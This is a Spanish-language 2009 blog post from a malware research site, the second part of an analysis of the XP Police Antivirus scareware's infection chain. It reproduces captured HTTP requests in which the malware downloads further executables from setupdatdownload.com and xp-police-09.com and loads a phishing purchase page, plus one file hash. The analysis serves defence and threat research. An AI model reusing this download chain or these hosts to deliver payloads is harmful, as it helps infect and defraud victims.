Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

lunes, 9 de marzo de 2009

Estrategia de infección agresiva de XP Police Antivirus. Segunda parte

Desde el momento que se produce la infección de XP Police Antivirus, el usuario comenzará a visualizar en pantalla una serie de ventanas emergentes de alertas sobre falsas infecciones, entre otras.

Pero de manera completamente transparente, se van produciendo una serie de acciones tendientes a completar la obra del scareware.

A través de la escucha del tráfico, vemos la descarga de los siguientes componentes:
GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com
Descarga setup.dat que no es un archivo de datos sino que es un archivo comprimido que guarda una copia de los otros archivos que se descomprimen en C:\Archivos de programa\XPPoliceAntivirus.
GET /sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com
Descarga sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) es utilizado para comprimir el malware en tiempo de ejecución para intentar evitar su detección por parte de programas antivirus.
GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:47:46 GMT
Content-Type: application/octet-stream
Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT
Accept-Ranges: bytes
Content-Length: 2746314
Connection: Keep-Alive
Age: 0

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.
GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: xp-police-09.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:51:15 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT
ETag: "3a58001-1-bd70a300"
Accept-Ranges: bytes
Content-Length: 1
Connection: Keep-Alive
Age: 0

2
GET /js/window.js HTTP/1.1
Accept: */*
Referer: http://www.xp-police-09.com/installed.php?id=108
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108
El JavaScript windows.js despliega en pantalla la ventana pop-up con la leyenda Thank you for Installation!


GET /buy.php?id=108 HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108
Esta es la página de compra del scareware desde donde se solicita información sensible y financiera de la víctima. Es un scam/phishing.

Las maniobras empleadas por los códigos maliciosos son cada vez más agresivas y eficaces en cuanto a sus acciones ya que, como se pudo apreciar, el instalador que se descarga en primera instancia, es sólo una parte del rompecabezas desde el cual el scareware obtiene las demás piezas.

Información relacionada
Estrategia de infección agresiva de XP Police Antivirus
Campaña de propagación de XP Police Antivirus a través de Ingeniería Social Visual
Una recorrida por los últimos scareware IV

# pistus

Publicado por Jorge Mieres

0 comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)